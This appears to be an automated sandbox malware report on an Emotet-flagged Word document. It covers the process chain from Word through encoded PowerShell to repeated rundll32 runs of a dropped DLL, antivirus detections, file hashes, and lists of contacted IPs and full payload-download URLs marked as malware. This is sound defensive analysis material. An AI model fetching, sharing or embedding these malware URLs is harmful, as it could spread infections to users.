                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 343897 Sample: Mensaje-22-012021.doc Startdate: 25/01/2021 Architecture: WINDOWS Score: 100 52 Multi AV Scanner detection for domain / URL 2->52 54 Antivirus detection for URL or domain 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 11 other signatures 2->58 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 24 2->17         started        process3 signatures4 66 Suspicious powershell command line found 14->66 68 Very long command line found 14->68 70 Encrypted powershell cmdline option found 14->70 19 powershell.exe 12 9 14->19         started        23 msg.exe 14->23         started        process5 dnsIp6 46 uagritech.com 162.241.253.129, 49165, 80 UNIFIEDLAYER-AS-1US United States 19->46 48 www.91yudao.com 124.156.135.253, 80 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN Singapore 19->48 50 yourcleanersurfaces.com 23.227.169.146, 49167, 80 HVC-ASUS United States 19->50 44 C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll, data 19->44 dropped 25 rundll32.exe 19->25         started        file7 process8 process9 27 rundll32.exe 25->27         started        process10 29 rundll32.exe 2 27->29         started        signatures11 64 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->64 32 rundll32.exe 29->32         started        process12 process13 34 rundll32.exe 1 32->34         started        signatures14 60 Hides that the sample has been downloaded from the Internet (zone.identifier) 34->60 37 rundll32.exe 34->37         started        process15 process16 39 rundll32.exe 1 37->39         started        signatures17 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 39->62 42 rundll32.exe 39->42         started        process18

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Mensaje-22-012021.doc62%VirustotalBrowse
                      Mensaje-22-012021.doc35%MetadefenderBrowse
                      Mensaje-22-012021.doc62%ReversingLabsScript-Macro.Trojan.Emotet

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      20.2.rundll32.exe.220000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      19.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.210000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      18.2.rundll32.exe.1c0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      23.2.rundll32.exe.290000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      21.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      22.2.rundll32.exe.170000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.210000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      17.2.rundll32.exe.1b0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      17.2.rundll32.exe.1d0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.270000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.2b0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      24.2.rundll32.exe.10000000.0.unpack100%AviraTR/Spy.GenDownload File
                      21.2.rundll32.exe.300000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      23.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      20.2.rundll32.exe.200000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      20.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.1f0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.1c0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      22.2.rundll32.exe.190000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      17.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      18.2.rundll32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.260000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      19.2.rundll32.exe.190000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      15.2.rundll32.exe.210000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.1e0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      18.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      22.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.700000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      15.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      uagritech.com5%VirustotalBrowse
                      www.91yudao.com7%VirustotalBrowse
                      yourcleanersurfaces.com10%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://fifacoinsbox.com/wp-content/7gYt/100%Avira URL Cloudmalware
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://yourcleanersurfaces.com/four-monks-acasz/O2my/100%Avira URL Cloudmalware
                      http://www.91yudao.com/wp-admin/KKHt1/100%Avira URL Cloudmalware
                      http://uagritech.com/cgi-sys/suspendedpage.cgi0%Avira URL Cloudsafe
                      http://seamart.info/alfacgiapi/q92A/100%Avira URL Cloudmalware
                      http://yourcleanersurfaces.com0%Avira URL Cloudsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      https://rbdck.com/wp-content/uploads/sucuri/lewfK/100%Avira URL Cloudmalware
                      http://uagritech.com/cgi-bin/a5G/100%Avira URL Cloudmalware
                      http://laymancoder.com/rustic-decor-1gbad/Us/100%Avira URL Cloudmalware
                      http://www.91yudao.com0%Avira URL Cloudsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://uagritech.com0%Avira URL Cloudsafe
                      http://seamart.info/alfacgiapi/q92A/P100%Avira URL Cloudmalware
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      uagritech.com
                      162.241.253.129
                      truetrueunknown
                      www.91yudao.com
                      124.156.135.253
                      truetrueunknown
                      yourcleanersurfaces.com
                      23.227.169.146
                      truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://yourcleanersurfaces.com/four-monks-acasz/O2my/true
                      • Avira URL Cloud: malware
                      unknown
                      http://uagritech.com/cgi-sys/suspendedpage.cgifalse
                      • Avira URL Cloud: safe
                      unknown
                      http://uagritech.com/cgi-bin/a5G/true
                      • Avira URL Cloud: malware
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.windows.com/pctv.rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmpfalse
                        high
                        http://investor.msn.comrundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmpfalse
                          high
                          http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmpfalse
                            high
                            https://fifacoinsbox.com/wp-content/7gYt/powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://ocsp.sectigo.com0powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.91yudao.com/wp-admin/KKHt1/powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://seamart.info/alfacgiapi/q92A/powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://yourcleanersurfaces.compowershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmpfalse
                              high
                              https://rbdck.com/wp-content/uploads/sucuri/lewfK/powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://laymancoder.com/rustic-decor-1gbad/Us/powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://www.91yudao.compowershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmpfalse
                                high
                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2165767085.0000000002460000.00000002.00000001.sdmpfalse
                                  high
                                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://investor.msn.com/rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmpfalse
                                    high
                                    http://uagritech.compowershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2169891604.0000000003BF2000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://seamart.info/alfacgiapi/q92A/Ppowershell.exe, 00000005.00000002.2167131717.0000000002D44000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://sectigo.com/CPS0Dpowershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2155549875.0000000000294000.00000004.00000020.sdmpfalse
                                      high
                                      http://www.%s.comPApowershell.exe, 00000005.00000002.2165767085.0000000002460000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2184265558.00000000027D0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      low
                                      http://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2155549875.0000000000294000.00000004.00000020.sdmpfalse
                                        high

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        23.227.169.146
                                        unknownUnited States
                                        29802HVC-ASUStrue
                                        162.241.253.129
                                        unknownUnited States
                                        46606UNIFIEDLAYER-AS-1UStrue
                                        124.156.135.253
                                        unknownSingapore
                                        132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue

                                        General Information

                                        Joe Sandbox Version:31.0.0 Emerald
                                        Analysis ID:343897
                                        Start date:25.01.2021
                                        Start time:18:39:16
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 10m 21s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:Mensaje-22-012021.doc
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:25
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • GSI enabled (VBA)
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winDOC@44/8@4/3
                                        EGA Information:
                                        • Successful, ratio: 94.7%
                                        HDC Information:
                                        • Successful, ratio: 29.2% (good quality ratio 21.2%)
                                        • Quality average: 59.5%
                                        • Quality standard deviation: 38%
                                        HCA Information:
                                        • Successful, ratio: 89%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .doc
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Found warning dialog
                                        • Click Ok
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                        • TCP Packets have been reduced to 100
                                        • Execution Graph export aborted for target powershell.exe, PID 2324 because it is empty
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        18:40:43API Interceptor1x Sleep call for process: msg.exe modified
                                        18:40:44API Interceptor225x Sleep call for process: powershell.exe modified
                                        18:41:25API Interceptor57x Sleep call for process: rundll32.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        162.241.253.129file.docGet hashmaliciousBrowse
                                        • uagritech.com/cgi-sys/suspendedpage.cgi
                                        file-2021-7_86628.docGet hashmaliciousBrowse
                                        • uagritech.com/cgi-bin/a5G/
                                        124.156.135.253file.docGet hashmaliciousBrowse
                                        • www.91yudao.com/wp-admin/KKHt1/

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        uagritech.comfile-2021-7_86628.docGet hashmaliciousBrowse
                                        • 162.241.253.129
                                        www.91yudao.comfile.docGet hashmaliciousBrowse
                                        • 124.156.135.253

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNcertificado.docGet hashmaliciousBrowse
                                        • 101.32.209.55
                                        file.docGet hashmaliciousBrowse
                                        • 124.156.135.253
                                        IFS_1.0.69.apkGet hashmaliciousBrowse
                                        • 129.226.103.217
                                        IFS_1.0.69.apkGet hashmaliciousBrowse
                                        • 129.226.103.12
                                        adware_beauty.apkGet hashmaliciousBrowse
                                        • 129.226.103.217
                                        flashplayerpp_install_cn (1).exeGet hashmaliciousBrowse
                                        • 211.152.136.89
                                        Mv Maersk Kleven V949E_pdf.exeGet hashmaliciousBrowse
                                        • 119.28.17.183
                                        Doc.docGet hashmaliciousBrowse
                                        • 124.156.117.232
                                        JI35907_2020.docGet hashmaliciousBrowse
                                        • 124.156.117.232
                                        DATI 2020.docGet hashmaliciousBrowse
                                        • 124.156.117.232
                                        TZ8322852306TL.docGet hashmaliciousBrowse
                                        • 129.226.14.227
                                        http://www.appdailyhunt.com/alfasymlink/O1m92JJ5CJWxojdaFgjPcIrL/Get hashmaliciousBrowse
                                        • 129.226.14.227
                                        http://www.appdailyhunt.com/alfasymlink/O1m92JJ5CJWxojdaFgjPcIrL/Get hashmaliciousBrowse
                                        • 129.226.14.227
                                        M9SEr6SviKGet hashmaliciousBrowse
                                        • 129.226.106.211
                                        Vu13RUIso4Get hashmaliciousBrowse
                                        • 49.51.74.60
                                        http://down.qq.com/lol/full/4218/LOL_V4.2.1.8_FULL.7z.003Get hashmaliciousBrowse
                                        • 203.205.137.29
                                        egint_cryptor.exeGet hashmaliciousBrowse
                                        • 170.106.35.220
                                        http://150.109.170.185Get hashmaliciousBrowse
                                        • 150.109.170.185
                                        inv_112020_65098.exeGet hashmaliciousBrowse
                                        • 170.106.35.220
                                        IKatdK48H3.exeGet hashmaliciousBrowse
                                        • 170.106.35.220
                                        UNIFIEDLAYER-AS-1USINV5949.xlsGet hashmaliciousBrowse
                                        • 192.232.216.109
                                        DOCUMENTS_RECEIVED.htmlGet hashmaliciousBrowse
                                        • 192.185.112.211
                                        INV 5047.xlsGet hashmaliciousBrowse
                                        • 192.185.217.211
                                        FP4554867134UQ.docGet hashmaliciousBrowse
                                        • 192.232.250.227
                                        MENSAJE.docGet hashmaliciousBrowse
                                        • 192.185.52.115
                                        MENSAJE.docGet hashmaliciousBrowse
                                        • 192.185.52.115
                                        Archivo_AB-96114571.docGet hashmaliciousBrowse
                                        • 192.185.52.115
                                        1_25_2021 11_20_30 a.m., [Payment 457 CMSupportDev].htmlGet hashmaliciousBrowse
                                        • 50.87.150.0
                                        5390080_2021_1-259043.docGet hashmaliciousBrowse
                                        • 192.185.52.115
                                        5390080_2021_1-259043.docGet hashmaliciousBrowse
                                        • 192.185.52.115
                                        request_form_1611565093.xlsmGet hashmaliciousBrowse
                                        • 50.87.232.245
                                        documents_0084568546754.exeGet hashmaliciousBrowse
                                        • 108.179.242.70
                                        mr kesh.exeGet hashmaliciousBrowse
                                        • 108.167.136.53
                                        79a2gzs3gkk.docGet hashmaliciousBrowse
                                        • 162.241.224.176
                                        INFO.docGet hashmaliciousBrowse
                                        • 162.241.224.176
                                        Electronic form.docGet hashmaliciousBrowse
                                        • 192.232.250.227
                                        file.docGet hashmaliciousBrowse
                                        • 162.241.253.129
                                        Payment_[Ref 72630 - joe.blow].htmlGet hashmaliciousBrowse
                                        • 50.87.150.0
                                        Payment _Arabian Parts Co BSC#U00a9.exeGet hashmaliciousBrowse
                                        • 74.220.199.6
                                        request_form_1611306935.xlsmGet hashmaliciousBrowse
                                        • 162.241.225.18
                                        HVC-ASUS57229937-122020-4-7676523.docGet hashmaliciousBrowse
                                        • 23.111.174.153
                                        Qt_1186.xlsGet hashmaliciousBrowse
                                        • 96.31.77.143
                                        Qt_1186.xlsGet hashmaliciousBrowse
                                        • 96.31.77.143
                                        dGWioTejLEz0eVM.exeGet hashmaliciousBrowse
                                        • 162.252.80.144
                                        9tyZf93qRdNHfVw.exeGet hashmaliciousBrowse
                                        • 162.252.80.144
                                        BANK SLIP.exeGet hashmaliciousBrowse
                                        • 104.156.59.2
                                        5YfNeXk1f0wrxXm.exeGet hashmaliciousBrowse
                                        • 37.1.210.155
                                        15012021.exeGet hashmaliciousBrowse
                                        • 23.111.136.146
                                        urgent specification request.exeGet hashmaliciousBrowse
                                        • 23.111.136.146
                                        P396143.htmGet hashmaliciousBrowse
                                        • 23.111.188.5
                                        SCAN_20210112_132640143,pdf.exeGet hashmaliciousBrowse
                                        • 199.193.115.48
                                        P166824.htmGet hashmaliciousBrowse
                                        • 23.111.188.5
                                        Archivo_122020_1977149.docGet hashmaliciousBrowse
                                        • 23.111.174.153
                                        H56P7iDwnJ.docGet hashmaliciousBrowse
                                        • 162.254.150.6
                                        0939489392303224233.exeGet hashmaliciousBrowse
                                        • 194.126.175.2
                                        RFQ-B201902-0064.exeGet hashmaliciousBrowse
                                        • 103.28.70.234
                                        ar208.exeGet hashmaliciousBrowse
                                        • 37.1.210.208
                                        ar208.exeGet hashmaliciousBrowse
                                        • 37.1.210.208
                                        QC679594 3012 2020 384-7560.docGet hashmaliciousBrowse
                                        • 23.111.174.153
                                        FILE 20201230 XC25584.docGet hashmaliciousBrowse
                                        • 23.111.174.153

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{51E1E6FE-FC7D-43F0-B5EC-EA333295AFA3}.tmp
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1024
                                        Entropy (8bit):0.05390218305374581
                                        Encrypted:false
                                        SSDEEP:3:ol3lYdn:4Wn
                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                        Malicious:false
                                        Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DFD62553-3B39-4424-842F-0904C3CEBA38}.tmp
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1536
                                        Entropy (8bit):1.3554734412254812
                                        Encrypted:false
                                        SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb2:IiiiiiiiiifdLloZQc8++lsJe1MzoC/
                                        MD5:7441DC2B308CCCA699850EA3301EF411
                                        SHA1:88175ECF2F2B60C85B6E91FB9685165ECD4E2A1F
                                        SHA-256:27A92CEB09BC5358622DCDF1015A0C369E8C4AF6EF838B2450F05DD2151900FC
                                        SHA-512:068E16D21F1C3416E3968CAE151B9DB96980B521D90378DB7578F2FC2B19BF96DE4DDA199AFD5BA6E704DBFD6BFF5B6B6020EE3259DA204E017CEA650BDDEBF5
                                        Malicious:false
                                        Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Mensaje-22-012021.LNK
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Tue Jan 26 01:40:40 2021, length=169472, window=hide
                                        Category:dropped
                                        Size (bytes):2098
                                        Entropy (8bit):4.519328285853816
                                        Encrypted:false
                                        SSDEEP:48:82f/XTFGq9bhqSr1qQh22f/XTFGq9bhqSr1qQ/:88/XJGqxESrAQh28/XJGqxESrAQ/
                                        MD5:B66DF24DB1A4F422A00793330B83B195
                                        SHA1:3A2DECDBC95A337172C24E70E9313304EAFB3E6B
                                        SHA-256:043EDF5F3E8BA4642E208E8D97DFACB24AC3074EFBF9357CDDC8225FF7B9ED6D
                                        SHA-512:2D6E7FD002455B7402A2B1B11F102BB8B928965C904B1EB116EEDD38286577E163989466B325FEA2A1A6BA69E561978DF3BBDADB289468D618F4CED2A93F701D
                                        Malicious:false
                                        Preview: L..................F.... ...-....{..-....{..O...................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....t.2.....:R.. .MENSAJ~1.DOC..X.......Q.y.Q.y*...8.....................M.e.n.s.a.j.e.-.2.2.-.0.1.2.0.2.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\128757\Users.user\Desktop\Mensaje-22-012021.doc.,.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.M.e.n.s.a.j.e.-.2.2.-.0.1.2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......128757..........D_....3N...W...9F.C
                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):89
                                        Entropy (8bit):4.2415047118077025
                                        Encrypted:false
                                        SSDEEP:3:M1JTlpplwAimlpplmX1JTlpplv:MZmWg1
                                        MD5:1B34D9FDE85A5BC6CE047DEF3971FFAD
                                        SHA1:6849AD57B070DBCF7F452E98D1F3623330718995
